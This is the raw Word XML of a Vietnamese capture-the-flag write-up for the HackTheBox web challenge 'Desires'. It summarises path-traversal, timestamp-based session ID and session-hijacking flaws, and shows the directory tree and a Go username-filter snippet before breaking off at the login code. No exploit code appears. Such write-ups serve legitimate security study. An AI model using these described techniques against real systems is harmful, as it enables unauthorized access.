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D637" w14:textId="13ED8CC9" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="007710FD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007710FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Tóm tắt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5532FBB7" w14:textId="1AA8139F" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="007710FD">
      <w:r w:rsidRPr="007710FD">
        <w:t>Thử thách liên quan đến một ứng dụng web với hệ thống đăng nhập và đăng ký duy nhất, nơi người dùng có thể tải lên các tệp được đổi tên bằng UUID. Quy trình đăng ký hạn chế tên người dùng chứa một số ký tự nhất định, nhưng hạn chế này không ngăn chặn hiệu quả các lỗ hổng duyệt đường dẫn. Logic đăng nhập tạo ID phiên dựa trên dấu thời gian, có thể dễ bị tấn công bằng cách thử nghiệm nếu biết tài khoản quản trị viên. Quản lý phiên lưu trữ các phiên trong Redis và lưu chúng dưới dạng tệp JSON, cho phép truy cập trái phép tiềm ẩn nếu biết tên người dùng của quản trị viên. Phần mềm trung gian kiểm tra các phiên hợp lệ nhưng có thể bị khai thác để truy cập bất kỳ phiên nào của người dùng, bao gồm cả phiên quản trị viên, nếu biết tên người dùng. Thử thách nêu bật các lỗi trong xử lý phiên và xác thực người dùng có thể bị khai thác để truy cập trái phép.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEF87FB" w14:textId="77777777" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="007710FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007710FD">
        <w:t>Độ khó: Dễ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43405C42" w14:textId="65F18229" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="007710FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007710FD">
        <w:t>Mục tiêu: </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="007710FD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>HackTheBox [</w:t>
        </w:r>
        <w:r w:rsidR="00D874C1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Desires</w:t>
        </w:r>
        <w:r w:rsidRPr="007710FD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>]</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="17203309" w14:textId="77777777" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="007710FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007710FD">
        <w:t>Loại: Kiểm toán mã</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495298B1" w14:textId="73C588CC" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="002C714A" w:rsidP="007710FD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Review qua về </w:t>
      </w:r>
      <w:r w:rsidR="00146C7B" w:rsidRPr="00146C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>source code</w:t>
      </w:r>
      <w:r w:rsidR="00A31005">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B88F87" w14:textId="1CFC811F" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="007710FD">
      <w:r w:rsidRPr="007710FD">
        <w:t xml:space="preserve">Đây là một câu hỏi Thử thách, được phân loại là Web, nhưng có vẻ giống kiểm tra mã nguồn hơn. Trước tiên, </w:t>
      </w:r>
      <w:r w:rsidR="00146C7B">
        <w:t xml:space="preserve">mình </w:t>
      </w:r>
      <w:r w:rsidRPr="007710FD">
        <w:t>lấy mã nguồn và tìm thấy cấu trúc thư mục như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4366DD9F" w14:textId="77777777" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="007710FD">
      <w:r w:rsidRPr="007710FD">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5103B7" w14:textId="77777777" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="007710FD">
      <w:r w:rsidRPr="007710FD">
        <w:t>├── service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B085873" w14:textId="77777777" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="007710FD">
      <w:r w:rsidRPr="007710FD">
        <w:t>│   ├── go.mod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A360CDD" w14:textId="77777777" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="007710FD">
      <w:r w:rsidRPr="007710FD">
        <w:t>│   ├── go.sum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0698795E" w14:textId="77777777" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="007710FD">
      <w:r w:rsidRPr="007710FD">
        <w:t>│   ├── main.go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2274C106" w14:textId="77777777" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="007710FD">
      <w:r w:rsidRPr="007710FD">
        <w:t>│   ├── services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741DCDA8" w14:textId="77777777" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="007710FD">
      <w:r w:rsidRPr="007710FD">
        <w:t>│   │   ├── http.go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36679500" w14:textId="77777777" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="007710FD">
      <w:r w:rsidRPr="007710FD">
        <w:t>│   │   └── sessions.go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECBFB4A" w14:textId="77777777" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="007710FD">
      <w:r w:rsidRPr="007710FD">
        <w:t>│   ├── static</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32741B01" w14:textId="77777777" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="007710FD">
      <w:r w:rsidRPr="007710FD">
        <w:t>│   │   └── styles.css</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3CB607" w14:textId="77777777" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="007710FD">
      <w:r w:rsidRPr="007710FD">
        <w:t>│   ├── utils</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531FFB04" w14:textId="77777777" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="007710FD">
      <w:r w:rsidRPr="007710FD">
        <w:t>│   │   ├── redis.go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEDA571" w14:textId="77777777" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="007710FD">
      <w:r w:rsidRPr="007710FD">
        <w:t>│   │   └── response.go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F0A37D" w14:textId="77777777" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="007710FD">
      <w:r w:rsidRPr="007710FD">
        <w:t>│   └── views</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BCB82C" w14:textId="77777777" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="007710FD">
      <w:r w:rsidRPr="007710FD">
        <w:t>│       ├── admin.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF22796" w14:textId="77777777" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="007710FD">
      <w:r w:rsidRPr="007710FD">
        <w:t>│       ├── dashboard.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E5506D" w14:textId="77777777" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="007710FD">
      <w:r w:rsidRPr="007710FD">
        <w:t>│       ├── login.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134B4283" w14:textId="77777777" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="007710FD">
      <w:r w:rsidRPr="007710FD">
        <w:t>│       ├── register.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4943580F" w14:textId="77777777" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="007710FD">
      <w:r w:rsidRPr="007710FD">
        <w:lastRenderedPageBreak/>
        <w:t>│       └── upload.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37960154" w14:textId="77777777" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="007710FD">
      <w:r w:rsidRPr="007710FD">
        <w:t>└── sso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BDD11B" w14:textId="77777777" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="007710FD">
      <w:r w:rsidRPr="007710FD">
        <w:t xml:space="preserve">    ├── index.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0BA743" w14:textId="77777777" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="007710FD">
      <w:r w:rsidRPr="007710FD">
        <w:t xml:space="preserve">    ├── package-lock.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231CA6DC" w14:textId="77777777" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="007710FD">
      <w:r w:rsidRPr="007710FD">
        <w:t xml:space="preserve">    └── package.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3A0085" w14:textId="552F7528" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="005D27CF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="007710FD">
        <w:t>Thư </w:t>
      </w:r>
      <w:r w:rsidR="00D874C1" w:rsidRPr="007710FD">
        <w:t xml:space="preserve">mục </w:t>
      </w:r>
      <w:r w:rsidRPr="007710FD">
        <w:t>service</w:t>
      </w:r>
      <w:r w:rsidR="00D874C1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007710FD">
        <w:t xml:space="preserve">chứa một </w:t>
      </w:r>
      <w:r w:rsidR="00D874C1">
        <w:t xml:space="preserve">đoạn code </w:t>
      </w:r>
      <w:r w:rsidRPr="007710FD">
        <w:t xml:space="preserve">web được viết bằng Golang, trong khi thư mục </w:t>
      </w:r>
      <w:r w:rsidR="00D874C1" w:rsidRPr="007710FD">
        <w:t>sso</w:t>
      </w:r>
      <w:r w:rsidR="00D874C1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007710FD">
        <w:t>chứa một mô-đun đăng nhập được triển khai bằng Node</w:t>
      </w:r>
      <w:r w:rsidR="005D27CF">
        <w:t xml:space="preserve"> JS</w:t>
      </w:r>
      <w:r w:rsidRPr="007710FD">
        <w:t>, cung cấp giao diện đăng nhập HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5532A371" w14:textId="1DF23212" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="005D27CF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007710FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Logic chức năng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B4F793" w14:textId="77777777" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="005D27CF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="007710FD">
        <w:t>Trước tiên, hãy cùng phác thảo logic chung. Sau khi người dùng đăng ký, họ có thể đăng nhập vào trang web và sử dụng tính năng tải lên để tải các tệp nén lên /app/service/uploads, tại đây tên tệp nén sẽ được đổi tên bằng UUID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438A8DDB" w14:textId="52FD69D3" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="005D27CF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="007710FD">
        <w:t xml:space="preserve">Sau đó, các tệp </w:t>
      </w:r>
      <w:r w:rsidR="005D27CF">
        <w:t xml:space="preserve">mà người dùng </w:t>
      </w:r>
      <w:r w:rsidRPr="007710FD">
        <w:t xml:space="preserve">đã tải lên sẽ được giải nén và được đặt </w:t>
      </w:r>
      <w:r w:rsidR="005D27CF">
        <w:t xml:space="preserve">vào </w:t>
      </w:r>
      <w:r w:rsidR="005D27CF" w:rsidRPr="007710FD">
        <w:t>thư mục</w:t>
      </w:r>
      <w:r w:rsidR="005D27CF" w:rsidRPr="007710FD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D27CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007710FD">
        <w:t>/app/service/files/{username}. Tại thời điểm này, các tệp đã giải nén sẽ không trải qua bất kỳ quá trình xử lý nào, chẳng hạn như đổi tên hoặc sửa đổi phần mở rộng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3570E107" w14:textId="6406D0E7" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="005D27CF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007710FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Logic đăng nhập </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4675948C" w14:textId="77777777" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="008C1AA9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="007710FD">
        <w:t>Logic đăng nhập được triển khai theo một cách khá khác thường, do đó có vẻ như điểm đột phá nằm ở đây, đòi hỏi phải xem xét cẩn thận.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F48CA5" w14:textId="13D53B5B" w:rsidR="007710FD" w:rsidRDefault="007710FD" w:rsidP="008C1AA9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="007710FD">
        <w:t>Đầu tiên, trong mô-đun đăng ký, có một đoạn mã quan trọng trong </w:t>
      </w:r>
      <w:r w:rsidR="008C1AA9" w:rsidRPr="007710FD">
        <w:t>hàm</w:t>
      </w:r>
      <w:r w:rsidR="008C1AA9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007710FD">
        <w:t>RegisterHandler:</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262A21" w:rsidRPr="00262A21" w14:paraId="704AA19E" w14:textId="77777777" w:rsidTr="003D6F23">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="153" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6958E20F" w14:textId="77777777" w:rsidR="00262A21" w:rsidRPr="00262A21" w:rsidRDefault="00262A21" w:rsidP="00262A21">
            <w:r w:rsidRPr="00262A21">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11E551A3" w14:textId="77777777" w:rsidR="00262A21" w:rsidRPr="00262A21" w:rsidRDefault="00262A21" w:rsidP="00262A21">
            <w:r w:rsidRPr="00262A21">
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25799B2E" w14:textId="77777777" w:rsidR="00262A21" w:rsidRPr="00262A21" w:rsidRDefault="00262A21" w:rsidP="00262A21">
            <w:r w:rsidRPr="00262A21">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4542F9B2" w14:textId="77777777" w:rsidR="00262A21" w:rsidRPr="00262A21" w:rsidRDefault="00262A21" w:rsidP="00262A21">
            <w:r w:rsidRPr="00262A21">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00262A21">
              <w:t xml:space="preserve"> strings.ContainsAny(credentials.Username, </w:t>
            </w:r>
            <w:r w:rsidRPr="00262A21">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"/.</w:t>
            </w:r>
            <w:r w:rsidRPr="00262A21">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>\\</w:t>
            </w:r>
            <w:r w:rsidRPr="00262A21">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="00262A21">
              <w:t>) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3571EE2B" w14:textId="77777777" w:rsidR="00262A21" w:rsidRPr="00262A21" w:rsidRDefault="00262A21" w:rsidP="00262A21">
            <w:r w:rsidRPr="00262A21">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00262A21">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00262A21">
              <w:t xml:space="preserve"> utils.ErrorResponse(c, </w:t>
            </w:r>
            <w:r w:rsidRPr="00262A21">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"Invalid Username"</w:t>
            </w:r>
            <w:r w:rsidRPr="00262A21">
              <w:t>, http.StatusBadRequest)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ECAAC8D" w14:textId="77777777" w:rsidR="00262A21" w:rsidRPr="00262A21" w:rsidRDefault="00262A21" w:rsidP="00262A21">
            <w:r w:rsidRPr="00262A21">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="57830C23" w14:textId="77777777" w:rsidR="00EC267B" w:rsidRPr="007710FD" w:rsidRDefault="00EC267B" w:rsidP="007710FD"/>
    <w:p w14:paraId="6BC46F41" w14:textId="1BA2895D" w:rsidR="007710FD" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="008C1AA9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="007710FD">
        <w:t>Điều này kiểm soát việc tên người dùng không được chứa các ký tự </w:t>
      </w:r>
      <w:r w:rsidRPr="007710FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007710FD">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="007710FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> \</w:t>
      </w:r>
      <w:r w:rsidRPr="007710FD">
        <w:t>, hoặc </w:t>
      </w:r>
      <w:r w:rsidRPr="007710FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="008C1AA9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007710FD">
        <w:t>trong quá trình đăng ký, nghĩa là tên người dùng có bất kỳ đường dẫn nào đều không thể được ghi vào cơ sở dữ liệu. Tuy nhiên, hạn chế này thực tế không hiệu quả.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10003C12" w14:textId="3C9303C6" w:rsidR="00113731" w:rsidRPr="007710FD" w:rsidRDefault="007710FD" w:rsidP="008C1AA9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="007710FD">
        <w:t>Tiếp theo là module đăng nhập. Vì </w:t>
      </w:r>
      <w:r w:rsidR="00C56BD8" w:rsidRPr="007710FD">
        <w:t xml:space="preserve">chức năng </w:t>
      </w:r>
      <w:r w:rsidRPr="007710FD">
        <w:t xml:space="preserve">LoginHandler này khá quan trọng nên </w:t>
      </w:r>
      <w:r w:rsidR="00C56BD8">
        <w:t>mình</w:t>
      </w:r>
      <w:r w:rsidRPr="007710FD">
        <w:t xml:space="preserve"> sẽ </w:t>
      </w:r>
      <w:r w:rsidR="00C56BD8">
        <w:t xml:space="preserve">đưa ra </w:t>
      </w:r>
      <w:r w:rsidRPr="007710FD">
        <w:t>đầy đủ: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706"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A910CC" w:rsidRPr="00A910CC" w14:paraId="262A8408" w14:textId="77777777" w:rsidTr="00A910CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FCA98FA" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="002F778B">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00A910CC">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A5B8609" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2431F198" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B0E2478" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5899D7AC" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20F3D7A6" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45A4BFF0" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C6442B6" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D6028DF" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D0CA3F1" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28FA1F7B" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E967DBD" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E627D27" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7367EB33" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74B6FFE8" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B845534" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EC5715A" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t>17</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="479A4BC8" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t>18</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="055A1971" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t>19</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C8EB919" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t>20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A5FE500" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t>21</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BE100A7" w14:textId="77777777" w:rsidR="00A910CC" w:rsidRPr="00A910CC" w:rsidRDefault="00A910CC" w:rsidP="00A910CC">
            <w:r w:rsidRPr="00A910CC">
              <w:t>22</w:t>
            </w:r>
          </w:p>
